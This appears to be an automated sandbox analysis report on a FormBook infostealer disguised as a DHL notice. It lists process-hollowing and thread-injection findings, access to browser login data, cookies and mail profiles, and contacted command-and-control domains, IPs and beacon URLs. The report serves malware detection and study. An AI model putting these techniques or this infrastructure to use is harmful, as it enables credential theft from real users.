          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451A44B mov eax, dword ptr fs:[00000030h]5_2_0451A44B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]5_2_0451AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]5_2_0451AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]5_2_0451AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]5_2_0451AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]5_2_0451AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]5_2_0451AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]5_2_0451AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]5_2_0451AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]5_2_0451AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]5_2_0451AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451AC7B mov eax, dword ptr fs:[00000030h]5_2_0451AC7B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0450746D mov eax, dword ptr fs:[00000030h]5_2_0450746D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B740D mov eax, dword ptr fs:[00000030h]5_2_045B740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B740D mov eax, dword ptr fs:[00000030h]5_2_045B740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B740D mov eax, dword ptr fs:[00000030h]5_2_045B740D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]5_2_045A1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]5_2_045A1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]5_2_045A1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]5_2_045A1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]5_2_045A1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]5_2_045A1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]5_2_045A1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]5_2_045A1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]5_2_045A1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]5_2_045A1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]5_2_045A1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]5_2_045A1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]5_2_045A1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A1C06 mov eax, dword ptr fs:[00000030h]5_2_045A1C06
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566C0A mov eax, dword ptr fs:[00000030h]5_2_04566C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566C0A mov eax, dword ptr fs:[00000030h]5_2_04566C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566C0A mov eax, dword ptr fs:[00000030h]5_2_04566C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566C0A mov eax, dword ptr fs:[00000030h]5_2_04566C0A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451BC2C mov eax, dword ptr fs:[00000030h]5_2_0451BC2C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B8CD6 mov eax, dword ptr fs:[00000030h]5_2_045B8CD6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A14FB mov eax, dword ptr fs:[00000030h]5_2_045A14FB
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566CF0 mov eax, dword ptr fs:[00000030h]5_2_04566CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566CF0 mov eax, dword ptr fs:[00000030h]5_2_04566CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566CF0 mov eax, dword ptr fs:[00000030h]5_2_04566CF0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]5_2_045A4496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]5_2_045A4496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]5_2_045A4496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]5_2_045A4496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]5_2_045A4496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]5_2_045A4496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]5_2_045A4496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]5_2_045A4496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]5_2_045A4496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]5_2_045A4496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]5_2_045A4496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]5_2_045A4496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045A4496 mov eax, dword ptr fs:[00000030h]5_2_045A4496
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F849B mov eax, dword ptr fs:[00000030h]5_2_044F849B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04507D50 mov eax, dword ptr fs:[00000030h]5_2_04507D50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04523D43 mov eax, dword ptr fs:[00000030h]5_2_04523D43
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04563540 mov eax, dword ptr fs:[00000030h]5_2_04563540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04593D40 mov eax, dword ptr fs:[00000030h]5_2_04593D40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0450C577 mov eax, dword ptr fs:[00000030h]5_2_0450C577
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0450C577 mov eax, dword ptr fs:[00000030h]5_2_0450C577
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0456A537 mov eax, dword ptr fs:[00000030h]5_2_0456A537
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045AE539 mov eax, dword ptr fs:[00000030h]5_2_045AE539
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04514D3B mov eax, dword ptr fs:[00000030h]5_2_04514D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04514D3B mov eax, dword ptr fs:[00000030h]5_2_04514D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04514D3B mov eax, dword ptr fs:[00000030h]5_2_04514D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045B8D34 mov eax, dword ptr fs:[00000030h]5_2_045B8D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]5_2_044F3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]5_2_044F3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]5_2_044F3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]5_2_044F3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]5_2_044F3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]5_2_044F3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]5_2_044F3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]5_2_044F3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]5_2_044F3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]5_2_044F3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]5_2_044F3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]5_2_044F3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044F3D34 mov eax, dword ptr fs:[00000030h]5_2_044F3D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044EAD30 mov eax, dword ptr fs:[00000030h]5_2_044EAD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566DC9 mov eax, dword ptr fs:[00000030h]5_2_04566DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566DC9 mov eax, dword ptr fs:[00000030h]5_2_04566DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566DC9 mov eax, dword ptr fs:[00000030h]5_2_04566DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566DC9 mov ecx, dword ptr fs:[00000030h]5_2_04566DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566DC9 mov eax, dword ptr fs:[00000030h]5_2_04566DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04566DC9 mov eax, dword ptr fs:[00000030h]5_2_04566DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04598DF1 mov eax, dword ptr fs:[00000030h]5_2_04598DF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044FD5E0 mov eax, dword ptr fs:[00000030h]5_2_044FD5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044FD5E0 mov eax, dword ptr fs:[00000030h]5_2_044FD5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045AFDE2 mov eax, dword ptr fs:[00000030h]5_2_045AFDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045AFDE2 mov eax, dword ptr fs:[00000030h]5_2_045AFDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045AFDE2 mov eax, dword ptr fs:[00000030h]5_2_045AFDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_045AFDE2 mov eax, dword ptr fs:[00000030h]5_2_045AFDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044E2D8A mov eax, dword ptr fs:[00000030h]5_2_044E2D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044E2D8A mov eax, dword ptr fs:[00000030h]5_2_044E2D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044E2D8A mov eax, dword ptr fs:[00000030h]5_2_044E2D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044E2D8A mov eax, dword ptr fs:[00000030h]5_2_044E2D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_044E2D8A mov eax, dword ptr fs:[00000030h]5_2_044E2D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451FD9B mov eax, dword ptr fs:[00000030h]5_2_0451FD9B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_0451FD9B mov eax, dword ptr fs:[00000030h]5_2_0451FD9B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 5_2_04512581 mov eax, dword ptr fs:[00000030h]5_2_04512581
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeCode function: 3_2_0040CF43 LdrLoadDll,3_2_0040CF43

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 198.46.160.97 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.denko-kosan.com
          Source: C:\Windows\explorer.exeDomain query: www.traindic.top
          Source: C:\Windows\explorer.exeNetwork Connect: 1.13.186.125 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 219.94.129.181 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 162.0.231.77 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 67.222.24.48 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 49.212.180.95 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.bohndigitaltech.com
          Source: C:\Windows\explorer.exeDomain query: www.0dhy.xyz
          Source: C:\Windows\explorer.exeDomain query: www.yongleproducts.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.24.110 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.rifleroofers.com
          Source: C:\Windows\explorer.exeDomain query: www.kunimi.org
          Source: C:\Windows\explorer.exeDomain query: www.amirah.cfd
          Source: C:\Windows\explorer.exeDomain query: www.bisarropainting.com
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: D0000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeProcess created: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe C:\Users\user\AppData\Local\Temp\zkvixbqxp.exeJump to behavior
          Source: explorer.exe, 00000004.00000000.249288085.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.505685177.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
          Source: explorer.exe, 00000004.00000000.256717981.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.509870496.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.476512956.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.249288085.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.505685177.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.248850915.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.504678905.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
          Source: explorer.exe, 00000004.00000000.249288085.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.505685177.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\cmmon32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API          		Path Interception1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		2
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium4
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts512
          Process Injection          		3
          Obfuscated Files or Information          		LSASS Memory5
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)11
          Software Packing          		Security Account Manager121
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Masquerading          		NTDS2
          Virtualization/Sandbox Evasion          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Virtualization/Sandbox Evasion          		LSA Secrets2
          Process Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Access Token Manipulation          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items512
          Process Injection          		DCSync1
          Remote System Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 831175 Sample: DHL_Notice_pdf.exe Startdate: 21/03/2023 Architecture: WINDOWS Score: 100 30 www.madliainsalu.com 2->30 32 madliainsalu.com 2->32 48 Snort IDS alert for network traffic 2->48 50 Multi AV Scanner detection for domain / URL 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 5 other signatures 2->54 10 DHL_Notice_pdf.exe 19 2->10         started        signatures3 process4 file5 28 C:\Users\user\AppData\Local\...\zkvixbqxp.exe, PE32 10->28 dropped 13 zkvixbqxp.exe 1 10->13         started        process6 signatures7 68 Multi AV Scanner detection for dropped file 13->68 70 Detected unpacking (changes PE section rights) 13->70 72 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 13->72 74 Maps a DLL or memory area into another process 13->74 16 zkvixbqxp.exe 13->16         started        19 conhost.exe 13->19         started        process8 signatures9 40 Modifies the context of a thread in another process (thread injection) 16->40 42 Maps a DLL or memory area into another process 16->42 44 Sample uses process hollowing technique 16->44 46 Queues an APC in another process (thread injection) 16->46 21 explorer.exe 3 6 16->21 injected process10 dnsIp11 34 bohndigitaltech.com 162.241.24.110, 49708, 49709, 49710 UNIFIEDLAYER-AS-1US United States 21->34 36 kunimi.org 219.94.129.181, 49702, 49703, 49704 SAKURA-CSAKURAInternetIncJP Japan 21->36 38 11 other IPs or domains 21->38 56 System process connects to network (likely due to code injection or exploit) 21->56 58 Performs DNS queries to domains with low reputation 21->58 25 cmmon32.exe 13 21->25         started        signatures12 process13 signatures14 60 Tries to steal Mail credentials (via file / registry access) 25->60 62 Tries to harvest and steal browser information (history, passwords, etc) 25->62 64 Modifies the context of a thread in another process (thread injection) 25->64 66 Maps a DLL or memory area into another process 25->66

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          DHL_Notice_pdf.exe46%ReversingLabsWin32.Trojan.Fragtor
          DHL_Notice_pdf.exe42%VirustotalBrowse
          DHL_Notice_pdf.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe27%ReversingLabsWin32.Trojan.Fragtor

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.zkvixbqxp.exe.9f0000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.zkvixbqxp.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          kunimi.org4%VirustotalBrowse
          bohndigitaltech.com5%VirustotalBrowse
          rifleroofers.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.buymyenergy.com0%Avira URL Cloudsafe
          http://www.yongleproducts.com/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw==100%Avira URL Cloudmalware
          http://www.bohndigitaltech.com0%Avira URL Cloudsafe
          http://www.0dhy.xyz/hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-X100%Avira URL Cloudmalware
          http://www.kunimi.org0%Avira URL Cloudsafe
          http://kunimi.org/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/ds0%Avira URL Cloudsafe
          http://www.buymyenergy.comReferer:0%Avira URL Cloudsafe
          http://www.kunimi.org/hpb7/0%Avira URL Cloudsafe
          http://www.kunimi.org/hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIMKLdu8Y9hsRKcKA==0%Avira URL Cloudsafe
          http://www.mindsetlighting.xyz/hpb7/100%Avira URL Cloudmalware
          http://www.amirah.cfd/hpb7/100%Avira URL Cloudphishing
          http://www.amirah.cfd100%Avira URL Cloudphishing
          http://www.bisarropainting.com/hpb7/:0%Avira URL Cloudsafe
          http://www.0dhy.xyz/hpb7/100%Avira URL Cloudmalware
          http://www.admet01.clubReferer:0%Avira URL Cloudsafe
          http://www.adoptiveimmunotech.com/hpb7/100%Avira URL Cloudmalware
          http://www.bohndigitaltech.com/hpb7/0%Avira URL Cloudsafe
